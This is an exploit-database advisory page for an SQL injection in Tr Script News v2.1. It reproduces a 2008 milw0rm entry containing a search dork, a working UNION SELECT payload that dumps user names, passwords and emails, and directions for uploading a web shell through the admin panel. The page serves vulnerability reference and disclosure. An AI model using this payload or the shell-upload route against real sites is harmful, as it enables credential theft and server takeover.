header-logo
Suggest Exploit
vendor:
Tr Script News
by:
His0k4
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Tr Script News
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: NO
Related CWE: N/A
CPE: a:trscript:tr_script_news
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Tr Script News v2.1

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'nb' parameter to '/news.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to bypass authentication and gain access to the administrator panel, or to gain access to sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically construct SQL queries.
Source

Exploit-DB raw data:

########################################################
#                                                      # 
#  Discovered by : His0k4 {Algerian HaCker}            #
#                                                      #
#  Email : His0k4.hlm[at]gmail[dot]com                 #
#                                                      #
#  Greetz to: All Dz & muslims HaCkeRs  :)               #
#                                                      #
#  Special Greetz:c02,Spym4n,THe-MooRiSH               #
#                                                      #
########################################################
#
#  Script   : Tr Script News v2.1
#
#  Download script     : http://www.easy-script.com/scripts-dl/trscript-21.zip
#
#  Dork        : inurl:news.php?mode=voir
#
#  Vulnerable file    : news.php
#
#  P.O.C
#  http://www.victime.com/[news_path]/news.php?mode=voir&nb=[SQL]
# 
#  Exemple:
#  http://www.victime.com/[news_path]/news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*
#
#  Admin login: /admin
#
#  Note: you can upload a shell from the administrator board by going in this link "/admin/main.php?mode=ajout_cat" and it will be uploaded in "[news_path]/images/icone_cat/shell.php"
#
#############################################################################

# milw0rm.com [2008-04-21]

Navigation

Suggest Exploit

Services By CQR